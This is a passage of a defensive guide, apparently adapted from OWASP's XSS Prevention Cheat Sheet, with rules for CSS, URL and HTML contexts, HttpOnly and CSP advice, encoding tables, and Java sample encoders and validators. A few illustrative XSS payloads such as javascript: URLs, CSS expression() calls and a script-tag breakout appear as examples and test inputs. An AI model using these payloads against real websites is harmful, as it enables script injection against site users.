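    // yields identical data while the HTML parser can no longer find
    // "</script>" or "<!--" in the embedded block.
    static String normalize(String json) {
        return json.replace("<", "\\u003c");
    }
}
```

The change is safe to apply blindly because JSON syntax outside of strings never uses `<`, so the result is still valid JSON describing the same value.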

RULE #4 - CSS Escape And Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values

Rule #4 applies when you want to put untrusted data into a stylesheet or a style tag. CSS is surprisingly powerful and can be used for numerous attacks. It is therefore important to use untrusted data only in a property value and nowhere else in style data. Stay away from putting untrusted data into complex properties such as url, behavior, and custom properties (-moz-binding). Also do not put untrusted data into IE's expression property value, which allows JavaScript.

 <style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style>     property value

 <style>selector { property : "...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."; } </style>   property value

 <span style="property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">text</span>       property value

Please note there are some CSS contexts that can never safely use untrusted data as input - EVEN IF PROPERLY CSS ESCAPED! You will have to ensure that URLs only start with "http" not "javascript" and that properties never start with "expression".

For example:

 { background-image : url("javascript:alert(1)"); }  // and all other URLs
 { width : expression(alert('XSS')); }               // only in IE
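When the expected shape of a value is known in advance, strict structural validation can reject payloads like these outright instead of relying on escaping alone. The sketch below assumes the untrusted value is meant to be a CSS length for a property such as width. The class name CssLengthValidator and the accepted units are illustrative choices, not taken from OWASP or ESAPI.

```java
import java.util.regex.Pattern;

// Hypothetical allowlist validator for one specific kind of CSS property value:
// a length such as "120px", "2.5em" or "50%". Anything else is rejected,
// which rules out url(...), expression(...), quotes, semicolons and braces.
final class CssLengthValidator {
    // 1-4 digits, an optional 1-2 digit fraction, then one allowed unit
    private static final Pattern LENGTH =
        Pattern.compile("\\d{1,4}(\\.\\d{1,2})?(px|em|rem|%)");

    private CssLengthValidator() {}

    static boolean isSafeLength(String value) {
        // matches() requires the whole string to fit the pattern
        return value != null && LENGTH.matcher(value).matches();
    }

    public static void main(String[] args) {
        String[] samples = {"120px", "2.5em", "expression(alert(1))", "1px;background:url(x)"};
        for (String v : samples) {
            System.out.println(v + " -> " + isSafeLength(v));
        }
    }
}
```

The pattern must match the whole string, so inputs such as expression(alert(1)) or 1px;background:url(x) fail validation.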

Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the \HH escaping format. DO NOT use any escaping shortcuts like \" because the quote character may be matched by the HTML attribute parser which runs first. These escaping shortcuts are also susceptible to "escape-the-escape" attacks where the attacker sends \" and the vulnerable code turns that into \\" which enables the quote.

If an attribute is quoted, breaking out of it requires the corresponding quote. All attributes should be quoted, but your encoding should be strong enough to prevent XSS even when untrusted data is placed in unquoted contexts. Unquoted attributes can be broken out of with many characters, including [space] % * + , - / ; < = > ^ and |. Also, a </style> tag will close the style block even when it appears inside a quoted string, because the HTML parser runs before the CSS parser. We recommend aggressive CSS encoding and validation to prevent XSS attacks for both quoted and unquoted attributes.

See the ESAPI reference implementation of CSS escaping and unescaping.

 String safe = ESAPI.encoder().encodeForCSS( request.getParameter( "input" ) );
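If ESAPI is not available, the escaping rule above can be sketched as a small Java method. This is a hypothetical stand-in written from the rule text, not the ESAPI implementation. It appends a trailing space after each \HH escape, which is one of the two ways the Output Encoding Rules Summary gives for terminating a short CSS escape.

```java
// Hypothetical CSS hex encoder following Rule #4: ASCII letters and digits
// pass through, and every other character below 256 becomes \HH followed by a
// space. The space ends the escape so that a following hex digit is not absorbed
// into it; the CSS parser discards that space. Characters at or above 256
// are left as-is, because the rule only covers values below 256.
final class CssHexEncoder {
    private CssHexEncoder() {}

    static String encode(String input) {
        StringBuilder out = new StringBuilder(input.length() * 2);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            boolean alnum = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9');
            if (alnum || c >= 256) {
                out.append(c);
            } else {
                out.append('\\').append(Integer.toHexString(c)).append(' ');
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(encode("red;}</style>"));
    }
}
```

For example, encode("red;}</style>") turns every punctuation character into an escape. As a result, neither the HTML parser nor the CSS parser sees a ;, a } or a </style> it could act on.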

RULE #5 - URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values

Rule #5 applies when you want to put untrusted data into an HTTP GET parameter value.

 <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a>

Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the %HH escaping format. Do not allow untrusted data in data: URLs, because escaping cannot reliably stop an attacker from switching out of the URL. All attributes should be quoted. Unquoted attributes can be broken out of with many characters, including [space] % * + , - / ; < = > ^ and |. Note that entity encoding is useless in this context.

See the ESAPI reference implementation of URL escaping and unescaping.

 String safe = ESAPI.encoder().encodeForURL( request.getParameter( "input" ) );
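If ESAPI is not available, the %HH rule can be sketched in Java as shown below. The class name UrlParamEncoder is illustrative. The sketch works on the UTF-8 bytes of the value and escapes everything except ASCII letters and digits, which is stricter than the JDK's java.net.URLEncoder.

```java
import java.nio.charset.StandardCharsets;

// Hypothetical strict percent-encoder for a single query-parameter value.
// Only ASCII letters and digits pass through; every other byte of the UTF-8
// encoding becomes %HH. Unlike java.net.URLEncoder, it also escapes . - * _
// and encodes a space as %20 rather than "+".
final class UrlParamEncoder {
    private UrlParamEncoder() {}

    static String encode(String value) {
        StringBuilder out = new StringBuilder();
        for (byte b : value.getBytes(StandardCharsets.UTF_8)) {
            int v = b & 0xFF; // treat the byte as unsigned 0-255
            boolean alnum = (v >= 'a' && v <= 'z') || (v >= 'A' && v <= 'Z') || (v >= '0' && v <= '9');
            if (alnum) {
                out.append((char) v);
            } else {
                out.append('%').append(String.format("%02X", v));
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String href = "http://www.somesite.com?test=" + encode("\"><script>alert(1)</script>");
        System.out.println(href);
    }
}
```

Only letters, digits and % appear in the output, so the encoded value also stays inside a quoted href attribute.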

WARNING: Do not encode complete or relative URLs with URL encoding! If untrusted input is meant to be placed into href, src or other URL-based attributes, validate it first to make sure it does not point to an unexpected protocol, especially javascript: links. Then encode the URL for its display context like any other piece of data. For example, user-driven URLs in href links should be attribute encoded:

 <%
   String userURL = request.getParameter( "userURL" );
   // "URL" names a validation pattern (Validator.URL) looked up in ESAPI.properties
   boolean isValidURL = ESAPI.validator().isValidInput("URLContext", userURL, "URL", 255, false);
   if (isValidURL) {
 %>
     <a href="<%= ESAPI.encoder().encodeForHTMLAttribute(userURL) %>">link</a>
 <% } %>
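The validation step can also be written without ESAPI's regex configuration. The sketch below is an illustration only, not ESAPI's validator. SafeUrlCheck is a hypothetical name. It relies on java.net.URI parsing plus an http/https scheme allowlist, as the XSS Prevention Rules Summary recommends. It rejects relative URLs, which may be too strict for some applications.

```java
import java.net.URI;
import java.net.URISyntaxException;

// Hypothetical allowlist check run before an untrusted URL is placed in an
// href or src attribute. It accepts only absolute http/https URLs with a host,
// so "javascript:", "data:" and scheme-relative URLs are all rejected.
// The result must still be HTML-attribute encoded when it is written out.
final class SafeUrlCheck {
    private SafeUrlCheck() {}

    static boolean isHttpUrl(String candidate) {
        if (candidate == null || candidate.length() > 255) {
            return false; // same 255-character limit as the ESAPI call above
        }
        try {
            URI uri = new URI(candidate);
            String scheme = uri.getScheme();
            return scheme != null
                && (scheme.equalsIgnoreCase("http") || scheme.equalsIgnoreCase("https"))
                && uri.getHost() != null;
        } catch (URISyntaxException e) {
            return false; // unparseable input is never trusted
        }
    }
}
```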

RULE #6 - Sanitize HTML Markup with a Library Designed for the Job

If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text. There are several available at OWASP that are simple to use:

OWASP AntiSamy - https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project

  import org.owasp.validator.html.*;
  Policy policy = Policy.getInstance(POLICY_FILE_LOCATION);
  AntiSamy as = new AntiSamy();
  CleanResults cr = as.scan(dirtyInput, policy);
  MyUserDAO.storeUserProfile(cr.getCleanHTML()); // some custom function

OWASP Java HTML Sanitizer - https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project

  import org.owasp.html.Sanitizers;
  import org.owasp.html.PolicyFactory;
  PolicyFactory sanitizer = Sanitizers.FORMATTING.and(Sanitizers.BLOCKS);
  String cleanResults = sanitizer.sanitize("<p>Hello, <b>World!</b>");

For more information on OWASP Java HTML Sanitizer policy construction, see http://owasp-java-html-sanitizer.googlecode.com/svn/trunk/distrib/javadoc/org/owasp/html/Sanitizers.html

Other libraries that provide HTML Sanitization include:

PHP HTML Purifier - http://htmlpurifier.org/
JavaScript/Node.js Bleach - https://github.com/ecto/bleach
Python Bleach - https://pypi.python.org/pypi/bleach

RULE #7 - Prevent DOM-based XSS

For details on what DOM-based XSS is, and on defenses against this type of XSS flaw, see the OWASP DOM based XSS Prevention Cheat Sheet.

Bonus Rule #1: Use HTTPOnly cookie flag

As you can see, preventing all XSS flaws in an application is hard. To help mitigate the impact of an XSS flaw on your site, OWASP also recommends that you set the HTTPOnly flag on your session cookie. Set it as well on any custom cookies that are not read by JavaScript you wrote. The flag is typically on by default in .NET apps, but in other languages you have to set it manually. For more details on the HTTPOnly cookie flag, including what it does and how to use it, see the OWASP article on HTTPOnly.
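The sketch below shows where the HttpOnly attribute sits in a Set-Cookie header. It is a hypothetical helper that formats the header by hand. In a Servlet 3.0 or later container you would normally call javax.servlet.http.Cookie#setHttpOnly(true) instead. The narrow character allowlists are an assumption made to keep the example safe.

```java
// Hypothetical helper that formats a Set-Cookie header value by hand, to show
// where the HttpOnly flag goes. The character allowlists are deliberately
// narrow so that a value cannot inject extra attributes or header lines.
final class SetCookieHeader {
    private SetCookieHeader() {}

    static String build(String name, String value, boolean secure) {
        if (!name.matches("[A-Za-z0-9_-]+") || !value.matches("[A-Za-z0-9._~+/=-]*")) {
            throw new IllegalArgumentException("unsupported cookie name or value");
        }
        StringBuilder header = new StringBuilder();
        header.append(name).append('=').append(value).append("; Path=/");
        if (secure) {
            header.append("; Secure"); // only sent over HTTPS
        }
        header.append("; HttpOnly"); // not readable from document.cookie
        return header.toString();
    }

    public static void main(String[] args) {
        System.out.println("Set-Cookie: " + build("JSESSIONID", "abc123", true));
    }
}
```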

Bonus Rule #2: Implement Content Security Policy

Content Security Policy (CSP) is another good, if complex, way to mitigate the impact of an XSS flaw. It is a browser-side mechanism that lets you create source whitelists for the client-side resources of your web application, e.g. JavaScript, CSS, images, etc. CSP is delivered in a special HTTP header, which instructs the browser to execute or render resources only from those sources. For example, this policy

Content-Security-Policy: default-src 'self'; script-src 'self' static.domain.tld

will instruct the web browser to load all resources only from the page's origin. It additionally allows JavaScript source files from static.domain.tld. For more details on Content Security Policy, including what it does and how to use it, see the OWASP article on Content Security Policy.
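In CSP, a space separates a directive name from its sources, not a colon. A small, hypothetical Java helper that assembles a header value from a directive map makes that syntax explicit. The class name CspHeader is illustrative, and the directives are the ones from the example above.

```java
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

// Hypothetical builder for a Content-Security-Policy header value. In CSP a
// space separates the directive name from its sources (no colon), and
// semicolons separate directives from each other.
final class CspHeader {
    private CspHeader() {}

    static String build(Map<String, List<String>> directives) {
        StringBuilder policy = new StringBuilder();
        for (Map.Entry<String, List<String>> d : directives.entrySet()) {
            if (policy.length() > 0) {
                policy.append("; ");
            }
            policy.append(d.getKey());
            for (String source : d.getValue()) {
                policy.append(' ').append(source);
            }
        }
        return policy.toString();
    }

    public static void main(String[] args) {
        Map<String, List<String>> directives = new LinkedHashMap<>(); // keeps insertion order
        directives.put("default-src", List.of("'self'"));
        directives.put("script-src", List.of("'self'", "static.domain.tld"));
        System.out.println("Content-Security-Policy: " + build(directives));
    }
}
```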

XSS Prevention Rules Summary

The following snippets of HTML demonstrate how to safely render untrusted data in a variety of different contexts.

Data Type	Context	Code Sample	Defense
String	HTML Body	<span>UNTRUSTED DATA</span>	HTML Entity Encoding
String	Safe HTML Attributes	<input type="text" name="fname" value="UNTRUSTED DATA">	Aggressive HTML Entity Encoding; only place untrusted data into a whitelist of safe attributes (listed below); strictly validate unsafe attributes such as background, id and name
String	GET Parameter	<a href="/site/search?value=UNTRUSTED DATA">clickme</a>	URL Encoding
String	Untrusted URL in a SRC or HREF attribute	<a href="UNTRUSTED URL">clickme</a> <iframe src="UNTRUSTED URL"></iframe>	Canonicalize input; URL validation; safe URL verification; whitelist http and https URLs only (avoid the JavaScript protocol to open a new window); attribute encoder
String	CSS Value	<div style="width: UNTRUSTED DATA;">Selection</div>	Strict structural validation; CSS hex encoding; good design of CSS features
String	JavaScript Variable	<script>var currentValue='UNTRUSTED DATA';</script> <script>someFunction('UNTRUSTED DATA');</script>	Ensure JavaScript variables are quoted; JavaScript hex encoding; JavaScript Unicode encoding; avoid backslash encoding (\" or \' or \\)
HTML	HTML Body	<div>UNTRUSTED HTML</div>	HTML validation (JSoup, AntiSamy, HTML Sanitizer)
String	DOM XSS	<script>document.write("UNTRUSTED INPUT: " + document.location.hash);</script>	DOM based XSS Prevention Cheat Sheet

Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width

Output Encoding Rules Summary

The purpose of output encoding (as it relates to Cross Site Scripting) is to convert untrusted input into a safe form, so that the browser displays it to the user as data and never executes it as code. The following chart lists the critical output encoding methods needed to stop Cross Site Scripting.

Encoding Type	Encoding Mechanism
HTML Entity Encoding	Convert & to &amp;, < to &lt;, > to &gt;, " to &quot;, ' to &#x27;, and / to &#x2F;
HTML Attribute Encoding	Except for alphanumeric characters, escape all characters with the HTML entity &#xHH; format, including spaces. (HH = hex value)
URL Encoding	Standard percent encoding, see: http://www.w3schools.com/tags/ref_urlencode.asp. URL encoding should only be used to encode parameter values, not the entire URL or path fragments of a URL.
JavaScript Encoding	Except for alphanumeric characters, escape all characters with the \uXXXX Unicode escaping format (X = hex digit).
CSS Hex Encoding	CSS escaping supports \XX and \XXXXXX. A two-character escape can cause problems if the next character continues the escape sequence. There are two solutions: (a) add a space after the CSS escape (the CSS parser ignores it), or (b) use the full six-digit escape by zero-padding the value.
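To make the chart concrete, here is a hypothetical Java sketch of three of its encoders: HTML entity, HTML attribute and JavaScript. It is written directly from the chart, not copied from ESAPI or any other library. Production code should prefer a maintained encoder such as the ESAPI methods shown earlier.

```java
// Hypothetical encoders written from the chart above (not ESAPI's code).
// Each one targets exactly one output context; using the wrong encoder for a
// context does not make the data safe.
final class OutputEncoders {
    private OutputEncoders() {}

    private static boolean isAsciiAlnum(int c) {
        return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9');
    }

    /** HTML entity encoding for element content, using the six mappings in the chart. */
    static String forHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  out.append("&amp;"); break;
                case '<':  out.append("&lt;"); break;
                case '>':  out.append("&gt;"); break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** HTML attribute encoding: every code point except ASCII letters and digits becomes &#xHH;. */
    static String forHtmlAttribute(String s) {
        StringBuilder out = new StringBuilder(s.length() * 2);
        s.codePoints().forEach(cp -> {
            if (isAsciiAlnum(cp)) {
                out.appendCodePoint(cp);
            } else {
                out.append("&#x").append(Integer.toHexString(cp)).append(';');
            }
        });
        return out.toString();
    }

    /** JavaScript encoding: every UTF-16 unit except ASCII letters and digits becomes a 4-hex-digit escape. */
    static String forJavaScript(String s) {
        StringBuilder out = new StringBuilder(s.length() * 6);
        for (char c : s.toCharArray()) {
            if (isAsciiAlnum(c)) {
                out.append(c);
            } else {
                out.append(String.format("\\u%04x", (int) c));
            }
        }
        return out.toString();
    }
}
```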